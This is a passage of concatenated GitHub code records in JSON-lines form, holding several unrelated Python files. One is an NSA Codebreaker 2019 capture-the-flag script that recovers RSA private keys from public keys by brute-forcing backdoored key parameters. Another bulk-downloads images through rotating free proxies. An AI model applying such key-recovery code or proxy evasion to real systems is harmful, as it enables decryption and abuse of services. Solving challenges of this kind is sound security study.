API key below by uncommenting line 10 and changing line 16 to api_key=API_KEY,\r\n# or set an environment variable (preferred) to define your API key. 
The former is insecure and not recommended.\r\n# For example, in Linux/macOS: export MERAKI_DASHBOARD_API_KEY=093b24e85df15a3e66f1fc359f4c48493eaa1b73\r\n#API_KEY = ''\r\n\r\n\r\ndef main():\r\n # Instantiate a Meraki dashboard API session\r\n dashboard = meraki.DashboardAPI(\r\n api_key='',\r\n base_url='https://api.meraki.com/api/v1/',\r\n output_log=True,\r\n log_file_prefix=os.path.basename(__file__)[:-3],\r\n log_path='',\r\n print_console=False\r\n )\r\n\r\n # Get list of organizations to which API key has access\r\n organizations = dashboard.organizations.getOrganizations()\r\n\r\n # Iterate through list of orgs\r\n for org in organizations:\r\n print()\r\n print('#'*80)\r\n print(f'\\nAnalyzing the organization with a name {org[\"name\"]}:')\r\n print()\r\n print('#'*80)\r\n org_id = org['id']\r\n print('*'*80)\r\n print(\"Found an organization with an id of :\"+org_id+\" with the following networks\")\r\n print()\r\n print('*'*80)\r\n\r\n # Get list of networks in organization\r\n try:\r\n networks = dashboard.organizations.getOrganizationNetworks(org_id)\r\n headers = [\"Network Name\", \"ID\", \"Tags\"]\r\n table = list()\r\n\r\n for net in networks:\r\n tr = [net.get('name'), net.get('organizationId'), net.get('tags')]\r\n table.append(tr)\r\n try:\r\n \r\n print(tabulate.tabulate(table, headers, tablefmt=\"fancy_grid\"))\r\n except UnicodeEncodeError:\r\n print(tabulate.tabulate(table, headers, tablefmt=\"grid\"))\r\n\r\n except meraki.APIError as e:\r\n print(f'Meraki API error: {e}')\r\n print(f'status code = {e.status}')\r\n print(f'reason = {e.reason}')\r\n print(f'error = {e.message}')\r\n continue\r\n except Exception as e:\r\n print(f'some other error: {e}')\r\n continue\r\n \r\n \r\n\r\n\r\nif __name__ == '__main__':\r\n start_time = datetime.now()\r\n main()\r\n end_time = datetime.now()\r\n print(f'\\nScript complete, total runtime {end_time - start_time}')\r\n","repo_name":"DeplorableJed/SASE","sub_path":"Meraki/list_orgs_networks.py","file_name":"list_orgs_networks.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"16162247557","text":"#!/usr/bin/env python3\n\nfrom Crypto.PublicKey import RSA\nimport argparse\nimport base64\nimport json\nimport hashlib\nimport sympy\nimport util\n\ndefault_keyparams = {\n \"256\": {\n \"params\": {\n \"privkey\": \"\",\n \"pubkey\":\n \"-----BEGIN PUBLIC KEY-----\\nMDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhAL3q7biU1tvH+280YFAetHj2AdynPE0F\\n3m29lGXiz7ABAgMBAAE=\\n-----END PUBLIC KEY-----\\n\",\n \"r1\": \"E+3pDVN853hZnbloDQq2cuZNSf6+egdQLxm3lxg9Kso=\",\n \"r2\": \"aUfuNx47CquEh78rf2a1rzxrgquj3lIRDoMUx04gPH0=\"\n }\n },\n \"512\": {\n \"params\": {\n \"privkey\":\n \"\",\n \"pubkey\":\n \"-----BEGIN PUBLIC KEY-----\\nMFswDQYJKoZIhvcNAQEBBQADSgAwRwJAId7KyhItIk+zWp2L7rEKURr94WGgv1pa\\nFyjGzFsblUpwEZid6vO3be4qvyOD34RpuZabZBjUT7EvsVhMejFj4QIDAQAB\\n-----END PUBLIC KEY-----\\n\",\n \"r1\":\n \"JNFP6sk10OqdMsJitbYPX6X+yGMYCfRhvfBAq/e4Q+j1w/xRW7iCGPfqh/zzN3Z5ChipkdB4qu+lh28ya6NWKQ==\",\n \"r2\":\n \"JH5XXqQVFd2lWwZgLrNrGpuz7AZXckaC3ve+Iyzmvz2/cPm7ltMHy0UWvb+L4pO8bF3qIfV+c/0LZPC3/1qFaw==\"\n }\n },\n \"1024\": {\n \"params\": {\n \"privkey\":\n \"\",\n \"pubkey\":\n \"-----BEGIN PUBLIC KEY-----\\nMIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgDg7pAaqadA1GiOkS3r9Eh17Lw+6\\n0ZgGd9zM0IGGUkLLbEoJOvwNSZ7MxU0tl/JX3U39oB/MCA/cimBept6GEIvB4OPr\\nviWzyWoQ3iDgJUDbrAZAz4pTPX/NmQskNga0y9sem1Rbxq80i3AZ9wcjJ0SYSoEV\\n1PCa4HOyj3DDEkj3AgMBAAE=\\n-----END PUBLIC 
KEY-----\\n\",\n \"r1\":\n \"HgXs0Dzbwl1oBPPsZw4RLAM1RyqxiNu4glAbkIejyW9aB+pI911saiAT2DcXXukCqAWHdpHG4BAWL8mIQve+03ZOiXkadaYYN6W1TETWmEsziXlWu2lPeuuMvq5lRBADMW/JM8pwO8ykqIAnyb4DjaMYzIjA1IMRYOHP7w7jhRY=\",\n \"r2\":\n \"P72R/c2IGTIjZFw38tFsUaJ7KIJDDIN7UeRBVzrY6066PTw3ojx8opPie6tInY3VuMw71QU3btegfpcHEyao2vOp6ENAaInqNna/wHiNmDDj3tO5wNvNe58Lt+p+L3IjdxAK4V0Vaws7f8tB27iK/AEeKdDAn2xtjgUerQXpYqI=\"\n }\n }\n}\n\n\nclass Keyparams(object):\n def __init__(self, keyparams):\n self.data = keyparams\n\n def get_privkey(self, keysize):\n return self.data[str(keysize)]['params']['privkey']\n\n def get_pubkey(self, keysize):\n return self.data[str(keysize)]['params']['pubkey']\n\n def get_r1(self, keysize):\n return self.data[str(keysize)]['params']['r1']\n\n def get_r2(self, keysize):\n return self.data[str(keysize)]['params']['r2']\n\n def set_privkey(self, keysize, privkey):\n self.data[str(keysize)]['params']['privkey'] = privkey.exportKey(\n 'PEM').decode('ascii')\n\n\ndef get_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-p',\n '--pubkey',\n dest='pubkey_filename',\n help='The public key (RSA-512, RSA-1024, RSA-2048) file name')\n parser.add_argument('-k',\n '--keyparams',\n dest='keyparams',\n help='The key params file name')\n parser.add_argument('-o',\n '--output',\n dest='output_filename',\n help='The output file name')\n options = parser.parse_args()\n if not options.pubkey_filename:\n parser.error(\n '[-] Please specify the public key file name, use --help for more info.'\n )\n if not options.output_filename:\n parser.error(\n '[-] Please specify the output file name, use --help for more info.'\n )\n return options\n\n\ndef init(keyparams):\n # use https://www.alpertron.com.ar/ECM.HTM to find the prime factors of n_256\n p = 260102157123667008590537578252202112167\n pubkey = RSA.importKey(keyparams.get_pubkey(256))\n privkey = util.rsa_construct_private_key(p, pubkey)\n if privkey:\n keyparams.set_privkey(256, privkey)\n return keyparams\n\n\ndef bytes_xor(a_bytes, b_bytes):\n min_len = len(a_bytes)\n result = bytearray(b_bytes)\n if min_len > len(b_bytes):\n min_len = len(b_bytes)\n result = a_bytes[:]\n for i in range(0, min_len):\n result[i] = a_bytes[i] ^ b_bytes[i]\n return result\n\n\ndef permute_r_key(r, keysize):\n r_bytes = util.to_bytes(r)\n if keysize == 512:\n return util.to_number(hashlib.sha256(r_bytes).digest())\n elif keysize == 1024:\n return util.to_number(hashlib.sha512(r_bytes).digest())\n elif keysize == 2048:\n first_hash = hashlib.sha512(r_bytes).digest()\n second_hash = hashlib.sha512(first_hash).digest()\n return util.to_number(first_hash + second_hash)\n else:\n print('[-] Cannot permute r key')\n return None\n\n\ndef determine_key_size(pubkey):\n keysize = pubkey.size()\n if keysize < 384:\n keysize = 256\n elif keysize < 768:\n keysize = 512\n elif keysize < 1536:\n keysize = 1024\n else:\n keysize = 2048\n return keysize\n\n\ndef recover_privkey_helper(pubkey, keysize, keyparams):\n print('[*] [RSA-%d] Finding the prime number p...' 
% keysize)\n n_bytes = util.to_bytes(pubkey.n)\n\n kp_keysize = keysize // 2\n kp_pubkey = RSA.importKey(keyparams.get_pubkey(kp_keysize))\n kp_r2_bytes = base64.b64decode(keyparams.get_r2(kp_keysize))\n kp_r2 = util.to_number(kp_r2_bytes)\n kp_privkey = RSA.importKey(keyparams.get_privkey(kp_keysize))\n\n encrypted_p_xor_r1_xor_r2 = n_bytes[0:len(kp_r2_bytes)]\n original_kp_r1_bytes = base64.b64decode(keyparams.get_r1(kp_keysize))\n\n for i in range(0, 0xffffff):\n kp_r2_bytes = util.to_bytes(kp_r2)\n encrypted_p_xor_r1 = bytes_xor(encrypted_p_xor_r1_xor_r2, kp_r2_bytes)\n p_xor_r1_bytes = util.rsa_decrypt(kp_privkey,\n bytes(encrypted_p_xor_r1))\n kp_r1 = util.to_number(original_kp_r1_bytes)\n for j in range(0, 0xa):\n for k in range(0, 0xa):\n kp_r1_bytes = util.to_bytes(kp_r1)\n p_bytes = bytes_xor(p_xor_r1_bytes, kp_r1_bytes)\n p = util.to_number(p_bytes)\n util.print_message('[RSA-%d] [%d:%d:%d] %d' %\n (keysize, i, j, k, p))\n if sympy.isprime(p) and sympy.isprime((p - 1) // 2):\n privkey = util.rsa_construct_private_key(p, pubkey)\n if privkey:\n print('\\n[+] [RSA-%d] p = %d' % (keysize, p))\n print('[+] [RSA-%d] Private key is recovered' %\n keysize)\n return privkey\n kp_r1 += 1\n kp_r1 = permute_r_key(kp_r1, keysize)\n kp_r2 += 1\n print('\\n[-] [RSA-%d] Cannot recover the private key' % keysize)\n return None\n\n\ndef recover_privkey(pubkey, keyparams):\n keysize = determine_key_size(pubkey)\n kp_keysize = 512\n while kp_keysize < keysize:\n kp_privkey = keyparams.get_privkey(kp_keysize)\n if kp_privkey == \"\":\n print('[*] Recovering keyparams...')\n kp_pubkey = RSA.importKey(keyparams.get_pubkey(kp_keysize))\n kp_privkey = recover_privkey_helper(kp_pubkey, kp_keysize,\n keyparams)\n if kp_privkey:\n keyparams.set_privkey(kp_keysize, kp_privkey)\n print('')\n else:\n return None\n kp_keysize *= 2\n\n print('[*] Recovering private key...')\n return recover_privkey_helper(pubkey, keysize, keyparams)\n\n\ndef export_keys(pem_pubkey, keyparams, output_filename):\n filename_priv_pem = output_filename + '_priv.pem'\n filename_pub_pem = output_filename + '_pub.pem'\n filename_priv_bin = output_filename + '_priv.bin'\n\n pubkey = RSA.importKey(pem_pubkey)\n privkey = recover_privkey(pubkey, keyparams)\n if privkey:\n util.rsa_write_key_to_pem_file(pubkey, filename_pub_pem)\n util.rsa_write_key_to_pem_file(privkey, filename_priv_pem)\n encrypted_privkey = util.aes_encrypt_ecb('390164',\n privkey.exportKey('PEM'))\n with open(filename_priv_bin, 'wb') as f:\n f.write(encrypted_privkey)\n print('[+] Encrypted private key has been written to file %s' %\n filename_priv_bin)\n return True\n return False\n\n\ndef main():\n options = get_arguments()\n\n print('\\n --:[ TERRORTIME PRIVATE KEY RECOVER ]:--')\n print(' 0x8861\\n')\n\n keyparams = Keyparams(default_keyparams)\n if options.keyparams:\n keyparams = Keyparams(util.read_json_file(options.keyparams))\n\n keyparams = init(keyparams)\n\n with open(options.pubkey_filename, 'r') as f:\n pem_pubkeys = f.read().split(':')\n\n print('[+] %d public keys found in the file %s\\n' %\n (len(pem_pubkeys), options.pubkey_filename))\n\n count = 0\n for i, pem_pubkey in enumerate(pem_pubkeys):\n output_filename = '{0}_{1:02d}'.format(options.output_filename, i + 1)\n is_success = export_keys(pem_pubkey, keyparams, output_filename)\n if is_success:\n count += 1\n print('')\n\n print('[+] %d private key(s) recovered' % count)\n\n\nif __name__ == '__main__':\n 
main()","repo_name":"t-ho/nsa-codebreaker-2019","sub_path":"task-07/recover_private_key.py","file_name":"recover_private_key.py","file_ext":"py","file_size_in_byte":9137,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"73335414235","text":"import io\nimport os\nimport re\nimport zipfile\nfrom datetime import datetime\n\nimport requests\nfrom lxml.html import document_fromstring\n\nfrom var_dev import env, product\n\n\ndef write_to_html(text):\n with open(\"html.txt\", \"w\", encoding=\"utf-8\") as w:\n w.write(text)\n\n\ndef read_html_file():\n with open(\"html.txt\", \"r\") as r:\n _html = r.read()\n return _html\n\n\ndef send_request(url):\n r = requests.get(url)\n assert r.status_code == 200\n return r.text\n\n\ndef get_items_one_page(number_page, __type, __cate):\n _url = product.base_url_cate.format(number_page, __type, __cate)\n print(_url)\n _html = send_request(_url)\n items = get_urls_img(_html)\n return sorted_items(items)\n\n\ndef sorted_items(__items):\n return sorted(__items, key=lambda x: list(x.keys())[0])\n\n\ndef filter_premium(_divs):\n return [item for item in _divs if item.get(\"data-multi\") != \"premium\"]\n\n\ndef get_urls_img(html):\n doc = document_fromstring(html)\n _divs = doc.find_class(\"showcase__item\")\n assert len(_divs) > 0\n _divs = filter_premium(_divs)\n _rs = list(map(lambda x: get_data_name_and_id(x), _divs))\n return _rs\n\n\ndef get_data_name_and_id(__item):\n __url_img = __item.get(\"data-image\")\n _name = get_name_of_item(__url_img)\n _id = __item.get(\"data-id\")\n return {_name: _id}\n\n\ndef get_name_of_item(str_input):\n return str_input.split(\"/\")[-1].split(\"_\")[0]\n\n\ndef write_downloaded_line(__type, __category, __page, __url):\n _path_dir = env.downloaded_dir.get(__type, None)\n assert _path_dir != None\n _path_to_page_folder = \"{0}{1}/page\".format(_path_dir, __category)\n if not os.path.exists(_path_to_page_folder):\n os.makedirs(_path_to_page_folder)\n\n _path_file = \"{0}/{1}.txt\".format(_path_to_page_folder, __page)\n print(_path_file)\n with open(_path_file, \"a+\") as w:\n w.write(__url + '\\n')\n\n# get_items_one_page(1, \"vector\", \"animals\")\n\n\ndef write_downloaded_line_dock(__page, __category, __type, __url):\n _text = \"{0}__{1}\".format(__page, __url)\n\n _download_dir = env.downloaded_dir.get(__type, None)\n assert _download_dir != None\n\n _path_dir_to_cate = \"{0}{1}\".format(_download_dir, __category)\n\n assert _path_dir_to_cate != None\n\n _path_dir = \"{0}/page/lastest.txt\".format(_path_dir_to_cate)\n with open(_path_dir, \"w\") as w:\n w.write(_text)\n\n\n# write_downloaded_line_dock(1, \"animals\", \"vector\", \"abc\")\n\n\ndef download_a_url(__item_data_download, __type, __category, __page):\n _ = list(__item_data_download.items())\n __item_id = _[0][1]\n __item_name = _[0][0]\n url_to_download = env.base_url_download.format(__item_id)\n # download_file\n download_file(url_to_download, __type, __category, __item_name)\n write_downloaded_line(__type, __category, __page, url_to_download)\n write_downloaded_line_dock(__page, __category, __type, url_to_download)\n\n\ndef change_proxy():\n r = requests.get(\"http://pubproxy.com/api/proxy?https=true\")\n try:\n _data_json = r.json()['data'][0]\n _ip_port = _data_json['ipPort']\n _proxy = \"https://{0}\".format(_ip_port)\n proxy_dict = {\n 'https': _proxy\n }\n return proxy_dict\n except Exception as e:\n print(\"######Exception###### change_proxy\")\n print(\"Khong the change proxy\")\n print(e)\n 
return None\n\n\ndef download_file(url, __type, __category, folder_name):\n category_path = \"{0}{1}/{2}\".format(env.download_dir, __type, __category)\n if not os.path.exists(category_path):\n os.makedirs(category_path)\n\n proxies = change_proxy()\n print(proxies)\n # assert proxies != None\n # print('b')\n with requests.get(url, proxies = proxies, stream=True) as r:\n assert r.status_code == 200\n z = zipfile.ZipFile(io.BytesIO(r.content))\n z.extractall(\n './download/{0}/{1}/{2}'.format(__type, __category, folder_name))\n\n\n# def download_file(url, __type, __category, folder_name):\n# category_path = \"{0}{1}/{2}\".format(env.download_dir, __type, __category)\n# if not os.path.exists(category_path):\n# os.makedirs(category_path)\n# # assert proxies != None\n# # print('b')\n# with requests.get(url, stream=True) as r:\n# assert r.status_code == 200\n# z = zipfile.ZipFile(io.BytesIO(r.content))\n# z.extractall(\n# './download/{0}/{1}/{2}'.format(__type, __category, folder_name))\n\n\ndef get_info_downloaded(__type, __category, __property):\n \n _download_dir = env.downloaded_dir.get(__type, None)\n assert _download_dir != None\n\n _path_dir_to_cate = \"{0}{1}\".format(_download_dir, __category)\n\n if not os.path.exists(_path_dir_to_cate):\n print(f\"Category :{__category} havent downloaded yet\")\n return None\n\n _path_to_open = \"{0}/page/lastest.txt\".format(_path_dir_to_cate)\n try:\n with open(_path_to_open, 'r') as f:\n __str = f.read()\n __page, __url = get_page_and_url(__str)\n return {\"page\": __page, \"url\": __url}.get(__property, None)\n\n except Exception as e:\n # if file doesnt exist, create file -> write 0 -> return 0\n print(_path_to_open + \" khong ton tai\")\n print(e)\n print(\"#######Creating#######\")\n with open(_path_to_open, \"w\") as w:\n w.write(\"1\")\n return 1\n\ndef get_page_and_url(__str):\n _ = __str.split(\"__\")\n __page = int(_[0])\n __url = _[1]\n return __page, __url\n\ndef find_a_item(__url, last_working_page, __type, __category):\n _page = last_working_page\n\n _page_downloaded = get_info_downloaded(__type, __category, \"page\")\n assert _page_downloaded != None\n\n # If the item is deleted, tool will download next page\n if _page - _page_downloaded == 4:\n return []\n\n _items = get_items_one_page(last_working_page, __type, __category)\n if find_index_of_item(_items, __url) is None:\n find_a_item(__url, _page + 1, __type, __category) # de quy\n\n return _items\n\n\ndef find_index_of_item(__items, __url):\n __id = get_id_from_url(__url)\n for i in range(0,len(__items)):\n if list(__items[i].values())[0] == __id:\n return i\n return None\n\n\ndef get_id_from_url(__url):\n __rs = re.findall(r'\\d', __url)\n return ''.join(__rs)\n\ndef get_download_dock(__type, __category):\n __page_downloaded = get_info_downloaded(__type, __category,\"page\")\n __url = get_info_downloaded(__type, __category, \"url\")\n\n assert __page_downloaded != None and __url != None\n __items = get_items_one_page(__page_downloaded, __type, __category)\n\n try:\n _index = find_index_of_item(__items, __url)\n if _index == len(__items) - 1:\n return [],__page_downloaded\n if not _index is None:\n __items = __items[_index + 1:]\n else:\n __items = get_download_dock_in_exception_case(\n __url, __page_downloaded, __type, __category)\n except ValueError as e:\n print(\"#########EXCEPTION#### get_download_dock\")\n print(e)\n\n return __items, __page_downloaded\n\n\ndef get_download_dock_in_exception_case(__url, last_working_page, __type, __category):\n __items = find_a_item(__url, 
last_working_page, __type, __category)\n if __items == []:\n return []\n try:\n _index = find_index_of_item(__items, __url)\n if _index == len(__items) - 1:\n return []\n return __items[_index + 1:] if not _index is None else __items\n except Exception as e:\n print(\"#############EXCEPTION###### get_download_dock_in_exception_case\")\n print(e)\n return __items\n\n\ndef download_a_page(__type, __category, mode= \"new\"):\n if mode == \"new\":\n __page = 1\n __data = get_items_one_page(__page, __type, __category)\n for i in __data:\n download_a_url(i, __type, __category, __page)\n \n if mode == \"continue\":\n __items_downloading, _page_downloaded = get_download_dock(__type, __category)\n if __items_downloading != []:\n for __item in __items_downloading:\n download_a_url(__item, __type, __category, _page_downloaded)\n __page = _page_downloaded + 1\n __data = get_items_one_page(__page, __type, __category)\n for i in __data:\n download_a_url(i, __type, __category, __page)\n\n\n\n# try:\n# data = get_items_one_page(1, \"vector\", \"animals\",)\n# download_a_url(data[0], \"vector\", \"animals\", 1)\n# except Exception as e:\n# print(e)\n","repo_name":"jetjokers24895/tool-download-v2","sub_path":"test/api_request.py","file_name":"api_request.py","file_ext":"py","file_size_in_byte":8561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"18132430382","text":"# imports\nfrom pandas_datareader import data, wb\nimport pandas as pd\nimport datetime\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport cufflinks as cf\n\ncf.go_offline()\n\nsns.set_style('whitegrid')\nstart = datetime.datetime(2006, 1, 1)\nend = datetime.datetime(2016, 1, 1)\n# stock information for the following banks:\n# Bank of America\nBAC = data.DataReader(\"BAC\", 'stooq', start, end)\n\n# CitiGroup\nC = data.DataReader(\"C\", 'stooq', start, end)\n\n# Goldman Sachs\nGS = data.DataReader(\"GS\", 'stooq', start, end)\n\n# JPMorgan Chase\nJPM = data.DataReader(\"JPM\", 'stooq', start, end)\n\n# Morgan Stanley\nMS = data.DataReader(\"MS\", 'stooq', start, end)\n\n# Wells Fargo\nWFC = data.DataReader(\"WFC\", 'stooq', start, end)\n\nprint(WFC.head())\n# list of the ticker symbols\ntickers = ['BAC', 'C', 'GS', 'JPM', 'MS', 'WFC']\nbank_stocks = pd.concat([BAC, C, GS, JPM, MS, WFC], axis=1, keys=tickers)\nbank_stocks.columns.names = ['Bank Ticker','Stock Info']\nprint(bank_stocks.head())\n# max Close price for each bank's stock throughout the time period\nbank_stocks.xs(key='Close', axis=1, level='Stock Info').max()\nreturns = pd.DataFrame()\nfor tick in tickers:\n returns[tick + ' Return'] = bank_stocks[tick]['Close'].pct_change()\nprint(returns.head())\nsns.pairplot(data=returns)\nplt.show()\nprint(returns.idxmin())\n# distplot using seaborn of the 2015 returns for Morgan Stanley\nsns.distplot(returns.loc['2015-01-01':'2015-12-31']['MS Return'], bins=50)\nplt.show()\nsns.distplot(returns.loc['2008-01-01':'2008-12-31']['C Return'], bins=50)\nplt.show()\nbank_stocks.xs(key='Close', axis=1, level='Stock Info').plot()\nplt.figure(figsize=(12, 6))\nplt.show()\nBAC['Close'].loc['2008-01-01':'2009-01-01'].rolling(window=30).mean().plot(label='30 Day Avg')\ntc = bank_stocks.xs(key='Close', axis=1, level='Stock Info').corr()\nsns.heatmap(tc, annot=True, cmap='coolwarm')\nplt.show()\n","repo_name":"DempcIzabela/PythonForDataScience","sub_path":"PandasNumPyExcercises/Finanse Project.py","file_name":"Finanse 
Project.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"11915813484","text":"from hashlib import sha1\nimport os\n\nfrom django.db.models.fields.files import ImageFieldFile\n\n\n__all__ = ('ThumbnailFieldFile', 'ImageWithThumbnailsFieldFile')\n\n\nclass ThumbnailSet(object):\n\n def __init__(self, field_file):\n self.file = field_file\n self.field = self.file.field\n self.instance = self.file.instance\n\n self._cache = {}\n\n def _populate(self):\n if not self._cache and self.file.name and self.instance:\n for options in self.field.thumbnails:\n try:\n attname, renderer, key = options\n except ValueError:\n attname, renderer = options\n key = attname\n ext = '.%s' % renderer.format\n\n name = self.field.get_thumbnail_filename(\n instance=self.instance,\n original_file=self.file,\n thumbnail_name=key,\n ext=ext)\n\n thumbnail = ThumbnailFieldFile(\n attname,\n renderer,\n self.instance,\n self.field,\n name)\n\n self._cache[attname] = thumbnail\n\n def clear_cache(self):\n self._cache = {}\n\n def __getattr__(self, name):\n self._populate()\n\n try:\n return self._cache[name]\n except KeyError:\n return None\n\n def __iter__(self):\n self._populate()\n for attname, value in self._cache.iteritems():\n yield value\n\n\nclass ThumbnailFieldFile(ImageFieldFile):\n\n def __init__(self, attname, renderer, *args, **kwargs):\n self.attname = attname\n self.renderer = renderer\n super(ThumbnailFieldFile, self).__init__(*args, **kwargs)\n\n def save(self):\n raise NotImplemented('Thumbnails cannot be saved directly.')\n\n\nclass ImageWithThumbnailsFieldFile(ImageFieldFile):\n \"\"\"File container for an ``ImageWithThumbnailsField``.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(ImageWithThumbnailsFieldFile, self).__init__(*args, **kwargs)\n self.thumbnails = ThumbnailSet(self)\n\n def save(self, name, content, save=True):\n # set file name to first 8 chars of hash of contents\n _, ext = os.path.splitext(name)\n file_hash = sha1(content.read()).hexdigest()[:8]\n name = file_hash + ext\n\n # save source file\n super(ImageWithThumbnailsFieldFile, self).save(name, content, save)\n\n self.thumbnails.clear_cache()\n\n for thumbnail in self.thumbnails:\n rendered = thumbnail.renderer.generate(content)\n self.field.storage.save(thumbnail.name, rendered)\n\n if save:\n self.instance.save()\n","repo_name":"CondeNast/django-undermythumb","sub_path":"undermythumb/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"50"} +{"seq_id":"3970521425","text":"import json\nimport os\nimport sys\nimport pytest\n\nsys.path.append(\n os.path.join(\n os.path.dirname(os.path.realpath(__file__)),\n os.pardir + os.sep + os.pardir\n )\n)\nimport tools\nfrom fixtures import (\n fixture_registry_url,\n fixture_client,\n fixture_repository,\n fixture_delete_tags,\n)\nfrom dregcli.console.delete import DeleteCommandHandler\n\n\nclass TestDeleteExclude:\n @pytest.mark.usefixtures(\n 'fixture_registry_url',\n 'fixture_client',\n 'fixture_repository',\n 'fixture_delete_tags',\n )\n def test_exclude(\n self,\n fixture_registry_url,\n fixture_client,\n fixture_repository,\n fixture_delete_tags,\n capsys\n ):\n # check data set adhoc state\n repo = fixture_client.repositories()[0]\n repo_tags = repo.tags()\n assert sorted(repo_tags) == sorted(fixture_delete_tags)\n\n isolated_tag = 'latest'\n exclude = 
r\"^{tag}\".format(tag=isolated_tag)\n handler = DeleteCommandHandler()\n deleted = handler.run(fixture_registry_url, fixture_repository, False,\n exclude=exclude)\n\n # check output: others than isolated_tag deleted\n expected_tags_left = fixture_delete_tags.copy()\n expected_tags_left.remove(isolated_tag)\n assert sorted(deleted) == sorted(expected_tags_left)\n\n # check should have isolated_tag left (by exclusion)\n assert repo.tags() == [isolated_tag]\n","repo_name":"anybox/dregcli","sub_path":"dregcli/tests/tests_integration/tests_delete/test_delete_exclude.py","file_name":"test_delete_exclude.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"9212922547","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\n################# 1. DATAFRAME\n\nfrom sklearn.datasets import load_boston\ndf=load_boston()\ndf\n\n#convert the array into dataframe\ndataset=pd.DataFrame(df.data)\ndataset\n\ndataset.info()\n\n# Adding the missing column names\n\ndataset.columns=df.feature_names\ndataset.head()\n\n\n################# 2. Independent features and dependent features\nX=dataset\ny=df.target\nX\n\n\n################# 3. train test split \n\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30, random_state=42) #mostly random_state is kept as 42\nX_train\n\n################# 4.standardizing the dataset\n\"\"\" Standardization is an important technique that is mostly performed as a pre-processing step before many machine learning models, \nto standardize the range of features of an input data set.And to improve the output\n\nBUT-\nLogistic regressions and tree-based algorithms such as decision trees, random forests and gradient boosting are not \nsensitive to the magnitude of variables. So standardization is not needed before fitting these kinds of models.\n\"\"\"\n\nfrom sklearn.preprocessing import StandardScaler\n\nscaler = StandardScaler()\nX_train=scaler.fit_transform(X_train)\nX_test=scaler.transform(X_test)\n\n\n################# 5.Applying Linear Regression Model\nfrom sklearn.linear_model import LinearRegression\n\nregression=LinearRegression()\nregression.fit(X_train,y_train)\n\n\n\n################# 6.Cross Validation - A type of hyper-parameter tuning\n'''Cross-validation is a technique for evaluating ML models by training several ML models on subsets of the available\n input data and evaluating them on the complementary subset of the data. Use cross-validation to detect overfitting, ie,\n failing to generalize a pattern.\n'''\nfrom sklearn.model_selection import cross_val_score\n\nmse=cross_val_score(regression,X_train,y_train,scoring='neg_mean_squared_error',cv=10)\nnp.mean(mse) # as mean is really small no. so its really good -25.550660791660782\n\n\n################# 7.Prediction \nreg_pred=regression.predict(X_test)\nreg_pred\n\n\n######## 8. 
Checking\n\nimport seaborn as sns\nsns.displot(reg_pred-y_test,kind='kde') # we are doing the differnce btw predicted and actual \n#as the grap is mostly between -10 to 10 with some variance to the left therefore the output is really good\n\n\nfrom sklearn.metrics import r2_score\nscore=r2_score(reg_pred,y_test)\nscore #0.6693702691495595\n","repo_name":"JubinThomas97/MACHINE_LEANING","sub_path":"MACHINE LEARNING/100_day_ML/Kish Nayak/Linear Regression Practical Implementation.py","file_name":"Linear Regression Practical Implementation.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"25931194533","text":"import pytest\n\nfrom pcapi.core.bookings.factories import BookingFactory\nfrom pcapi.core.bookings.models import Booking\nfrom pcapi.core.bookings.models import BookingCancellationReasons\nfrom pcapi.core.bookings.models import BookingStatus\nimport pcapi.core.offerers.factories as offerers_factories\nfrom pcapi.core.offerers.models import Offerer\nfrom pcapi.core.offerers.models import Venue\nfrom pcapi.core.offers.factories import OfferFactory\nfrom pcapi.core.offers.factories import StockFactory\nfrom pcapi.core.offers.models import Offer\nfrom pcapi.core.offers.models import Stock\nfrom pcapi.core.users.factories import AdminFactory\nfrom pcapi.core.users.factories import BeneficiaryGrant18Factory\nfrom pcapi.core.users.factories import ProFactory\nfrom pcapi.scripts.suspend_fraudulent_pro_users import suspend_fraudulent_pro_by_email_providers\n\n\n@pytest.mark.usefixtures(\"db_session\")\ndef test_suspend_pros_in_given_emails_providers_list():\n # Given\n fraudulent_emails_providers = [\"example.com\"]\n admin_user = AdminFactory(email=\"admin@example.net\")\n fraudulent_user = ProFactory(\n email=\"jesuisunefraude@example.com\",\n )\n offerer = offerers_factories.OffererFactory()\n offerers_factories.UserOffererFactory(user=fraudulent_user, offerer=offerer)\n\n # When\n suspend_fraudulent_pro_by_email_providers(fraudulent_emails_providers, admin_user, dry_run=False)\n\n # Then\n assert not fraudulent_user.isActive\n\n\n@pytest.mark.usefixtures(\"db_session\")\ndef test_only_suspend_pro_users_in_given_emails_providers_list():\n # Given\n fraudulent_emails_providers = [\"example.com\"]\n admin_user = AdminFactory(email=\"admin@example.net\")\n pro_fraudulent_user_with_uppercase_domain = ProFactory(email=\"jesuisunefraude@EXAmple.com\")\n pro_fraudulent_user_with_subdomain = ProFactory(email=\"jesuisunefraude@sub.example.com\")\n beneficiary_fraudulent_user = BeneficiaryGrant18Factory(email=\"jesuisuneautrefraude@example.com\")\n offerer1 = offerers_factories.OffererFactory()\n offerers_factories.UserOffererFactory(user=pro_fraudulent_user_with_uppercase_domain, offerer=offerer1)\n offerer2 = offerers_factories.OffererFactory()\n offerers_factories.UserOffererFactory(user=pro_fraudulent_user_with_subdomain, offerer=offerer2)\n\n # When\n suspend_fraudulent_pro_by_email_providers(fraudulent_emails_providers, admin_user, dry_run=False)\n\n # Then\n assert not 